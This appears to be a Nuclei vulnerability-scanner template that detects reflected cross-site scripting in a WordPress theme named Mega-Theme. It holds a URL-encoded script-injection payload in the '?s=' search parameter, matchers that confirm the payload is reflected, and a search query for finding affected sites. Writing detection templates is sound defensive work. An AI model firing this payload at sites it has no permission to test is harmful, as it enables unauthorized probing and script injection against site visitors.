nuclei-templates/http/vulnerabilities/wordpress/wp-mega-theme.yaml

32 lines
1.0 KiB
YAML

id: wp-mega-theme
info:
name: Mega Wordpress Theme - Cross site scripting
author: r3Y3r53
severity: medium
description: |
WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
metadata:
verified: true
max-request: 1
google-query: Megawp-Theme
tags: wp,wp-theme,wordpress,xss,mega
http:
- method: GET
path:
- "{{BaseURL}}/?s=%22%3E%3Cscript%3Ealert(`document.domain`)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "script>alert(`document.domain`)</script") && contains(body, "mega-theme")'
condition: and
# digest: 490a0046304402202d0f678099bcd0db5b945b5d58a745d57b13ed17cfe4671b79e2bb0aa474a14a022009c8125c5b5cd6b0189fbfe1f657f3090b8b51a72fc66c06eda99fd57f93819e:922c64590222798bb761d5b6d8e72950